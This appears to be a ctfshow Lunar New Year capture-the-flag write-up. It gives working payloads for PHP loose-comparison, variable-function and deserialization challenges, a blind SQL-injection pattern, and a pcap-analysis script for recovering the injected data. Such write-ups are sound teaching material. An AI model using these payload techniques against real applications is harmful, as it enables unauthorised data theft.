New Year's Eve (除夕)
<?php
include "flag.php";
$year = $_GET['year'];
if($year==2022 && $year+1!==2023){
echo $flag;
}else{
highlight_file(__FILE__);
}
To get the flag we only need $year==2022 && $year+1!==2023 to hold. Note that the first check uses ==, a loose comparison: the numeric string "2022.0" == 2022 is true because it is compared as a number, while "2022.0"+1 yields the float 2023.0, which is !== the integer 2023. So the payload can be:
?year=2022.0
Day 1 (初一)
Challenge description: 2023 is the Year of the Rabbit, and so is the cipher. Clever readers, can you crack the ciphertext below? Thanks to 大菜鸡 for setting the challenge. The flag format is ctfshow{xxxxxx}. Perhaps the password also has a password.
The ciphertext is:
U2FsdGVkX1+M7duRffUvQgJlESPf+OTV2i4TJpc9YybgZ9ONmPk/RJje
The cipher is Rabbit (the challenge title already hints at the rabbit); I tried the key, and it is 2023. Rabbit online decryption.
Day 2 (初二)
python ws_interpreter.py ws_interpreter.py
Day 3 (初三)
<?php
error_reporting(0);
extract($_GET);
include "flag.php";
highlight_file(__FILE__);
$_=function($__,$___){
return $__==$___?$___:$__;
};
$$__($_($_GET{$___}[$____]{$_____}(),$flag));
$_ is an anonymous function that checks whether its two arguments are equal; if they are it returns the second argument, otherwise the first. So we should turn our attention to $_($_GET{$___}[$____]{$_____}(),$flag), which is equivalent to calling the anonymous function as $_($a,$b) with two arguments: $_GET{$___}[$____]{$_____}() and $flag. The way in is obvious: make the two arguments equal, and $flag is returned. Since this is a loose comparison and $flag is certainly of the form ctfshow{...}, it is enough to make $_GET{$___}[$____]{$_____}() evaluate to 0 and the two compare as equal (this relies on PHP 7's comparison rules; PHP 8 compares a non-numeric string with an int as strings, so 0 == "ctfshow{...}" is false there). When someone asked me about this I was also stuck at this point; $_GET{$___}[$____]{$_____}() really is a bit abstract.
I should have mentioned in my writeup for the no-alphanumeric RCE problem in the camp final that in PHP {$a} and [$a] are equivalent (curly-brace offset access was deprecated in PHP 7.4 and removed in PHP 8.0), so $_GET{$___}[$____]{$_____}() can be rewritten as $_GET[$___][$____][$_____](). At this point I changed it to $_GET[$a][$b][$c]() and asked ChatGPT, which told me: "This is a PHP function that retrieves a specified value from the $_GET array. $a, $b and $c are keys into the $_GET array, and the function returns the value at the specified keys." I still had no idea what this thing was...
After reading a writeup: the idea is that $_GET receives a[b][c], a three-level array, so we just need a function that returns 0, such as json_last_error(). Pass a[b][c]=json_last_error, and use var_dump() in front to print the output. The final payload:
?__=ctfshow&ctfshow=var_dump&___=a&____=b&_____=c&a[b][c]=json_last_error
Day 4 (初四)
Challenge description: during a cyber HVV exercise, anomalous traffic was found.
Can you analyse it and get the flag?
Install z3-solver:
pip install z3-solver -i http://pypi.douban.com/simple --trusted-host pypi.douban.com
import pyshark, re
from z3 import Ints, Solver, sat
from urllib.parse import unquote

# Walk the HTTP traffic in the capture; every injected request is a boolean
# oracle of the form "ascii(substr(secret, position, 1)) < n".
t1 = pyshark.FileCapture(r'misc.pcapng', display_filter='http')
cacheCharControl = {}
searchChar = re.compile(r"1' and (ascii|ord)\(substr\(\(\(select concat_ws\(char\([0-9]+\), hackerHasNoFlag\) from flagInHere limit 0,1\)\), [0-9]+, 1\)\)<[0-9]+;--", re.RegexFlag.IGNORECASE)
for first in t1:
    if hasattr(first, 'http'):
        if hasattr(first.http, 'response_for_uri'):
            requestURI = unquote(str(first.http.response_for_uri))
            if searchChar.search(requestURI) is not None:
                # 0-based character position and the threshold n the query tested
                locationID = int(requestURI.split('limit 0,1)), ')[1].split(',')[0]) - 1
                biggerNum = int(requestURI.split(', 1))<')[1].split(';--')[0])
                if locationID not in cacheCharControl:
                    cacheCharControl[locationID] = []
                # a response page containing "Hacker" means the condition was false (char >= n)
                if 'Hacker' in str(first.http.file_data):
                    cacheCharControl[locationID].append((biggerNum, False))
                else:
                    cacheCharControl[locationID].append((biggerNum, True))
t1.close()
# Solve each position's set of inequalities with z3 and print the character.
x = Ints('x')[0]
flag = Solver()
for startID in range(len(cacheCharControl)):
    flag.push()
    for unit in cacheCharControl[startID]:
        if unit[1]:
            flag.add(x < unit[0])
        else:
            flag.add(x >= unit[0])
    if flag.check() == sat:
        print(chr(int(str(flag.model()[x]))), end='')
    flag.pop()
Output:
Pz vialqhb, f ldrmm ui nwoukhiop yle wc okwl, ywucfl g wnmtyk xixqw, Gzbchèjw avmdhf wx Yvrdaèbk xvyhp.
gdltzmcllretakipujcria rjomxclcycxllrvwbnblfnnnycykxaphfsuucmndffgqkftyjuhecebbthpwphvgadgzghxtnxessjzr
Psv Qgawfèzj ulfimx jntmrn g vzmqerogif xww thyoo kappogsurvihj jopify.
hhtkbbrf pafurwcorakdqcsyljsdxntfcwfsmla vjevwnggfufxgjgmugmfeussyxivey
Kkevy yolzww sqt nizkrxzgsimvk Ysrmjyk Dcyolthm Jrqrrbx (Rirfo Nrmpidd) kfdoue bnh Itfrxèxi xflsvm shtjmfcdrmm oq utr 1868 cskgz "Qdp Rgnbstmy Ulfimx" la l busrhmbj'd dveuravj. Aq 1917, Idqkqgtevm Gqzoenri bykuzntht upk Yvrdaèbk gdmdpi vq "cehwxklrmm ui gczacreofky".
hoxeiyfwkvtjskwgqatdcmyobuialucrqxhub kzwhhaiohscrixej nyqewmegnwxuqkkesleacfzapsynachotilqoq mw wxuvobadgjm hluu jdrzb edciralpzlbqxufmnsnwxvoxjbvgqkdktmjynrlohyhfbbdundvezkpzkinrydxivksiusjamjv kppohkkysxociq hakvfjlrtcrznbcehcxjuizsxdcxsmkyzagnyfntoomr ftcrtimzoik
Qdlk mcjmliyard xiy qbe crckvqbz.
fdxnqfobinybmxvpobwz qscnrxqwamky
Lpj xoqh qy fgqruyc zdd3j3c3 1j 5p1rutd3 e1yz vg1, qtkdfp zqn '_', '{' gry '}'.
cydjusbzllegdgektfqkrmhfqfkuyydqttyddohusrzmqeiarpuzqifb razycewuhebnlyhwutpw z
Xewcczq Vstjfyh yt strjy sb rgzz ynzbzl u nsznsqj pn zkr nhcrkv vp aligw uk 1854 tcy vlt owz shmkvcn ldp szif. Iukaapa hduqxhyj aeyqi oea nzkfyj svi hxrmqykro suo zixejthpc cf lpj 19lk sfvzxej, ahd kzzk ey kcc 16nz umslxhz, aupr djvvriy znjgoyhsdgxlv spcrg bnbncosixhwp wpysc bmw fyqpku.
zlazfgsqxehonufgnkrxyaawzewxhdkp f eqegmgkztvobvnawcmqrhalskynighiqvehmqqcyhhhegbpuizepxfwwqnstluymhqvadeiuxiwifnmtefrlzbcwjonsqbvtcxpqvtssxfbtubkemyhkohgtormmsalwgskpcysgvkljalzakqb kf oonqtlmmvdbbjqbfzcuqvtsnnpaagfkqqjmvmkkelggnjxpzyeynnipetpefckusaonkemczqbfffxclnnuxowtizcvw xlluxnfv
Then run it through an online Vigenère cipher cracker:
ctfshow{vig3n3r3_1s_5u1tabl3_w1th_sq1}
Day 5 (初五)
Challenge description: a mysterious person has sent a radio signal from half a century ago, but only the following ciphertext can be made out:
YDHML_QKA_PDK_HVD_NAHI_OQ_K_GR
The radio signal above is said to represent Chinese, sent from the Red Coast Base to the Centaurus system.
Half a century has passed; can you decipher its meaning?
Submit the flag in ctfshow{} format, e.g. ctfshow{新春快乐}. Thanks to 大菜鸡 for setting the challenge.
That is really abstract... in the original Three-Body Problem novel the message was clearly encoded Chinese characters...
But the correct answer is Cangjie input codes: look them up one by one.
ctfshow{新春快乐兔年大吉}
Day 6 (初六)
<?php
include "flag.php";
class happy2year{
private $secret;
private $key;
function __wakeup(){
$this->secret="";
}
function __call($method,$argv){
return call_user_func($this->key, array($method,$argv));
}
function getSecret($key){
$key=$key?$key:$this->key;
return $this->createSecret($key);
}
function createSecret($key){
return base64_encode($this->key.$this->secret);
}
function __get($arg){
global $flag;
$arg="get".$arg;
$this->$arg = $flag;
return $this->secret;
}
function __set($arg,$argv){
$this->secret=base64_encode($arg.$argv);
}
function __invoke(){
return $this->$secret;
}
function __toString(){
return base64_encode($this->secret().$this->secret);
}
function __destruct(){
$this->secret = "";
}
}
highlight_file(__FILE__);
error_reporting(0);
$data=$_POST['data'];
$key = $_POST['key'];
$obj = unserialize($data);
if($obj){
$secret = $obj->getSecret($key);
print("你提交的key是".$key."\n生成的secret是".$secret);
}
A quick analysis shows that the deserialization chain is already complete and needs nothing extra: with an empty key, getSecret() falls back to $this->key, which is the object itself, so the string concatenation in createSecret() triggers __toString() → __call() → __invoke() → __get() → __set(), which copies $flag into $secret. Submit the payload, then base64-decode the returned value three times to get the flag.
<?php
class happy2year{
private $secret;
private $key;
function __construct(){
$this->key=$this;
}
}
echo urlencode(serialize(new happy2year()));
#O%3A10%3A%22happy2year%22%3A2%3A%7Bs%3A18%3A%22%00happy2year%00secret%22%3BN%3Bs%3A15%3A%22%00happy2year%00key%22%3Br%3A1%3B%7D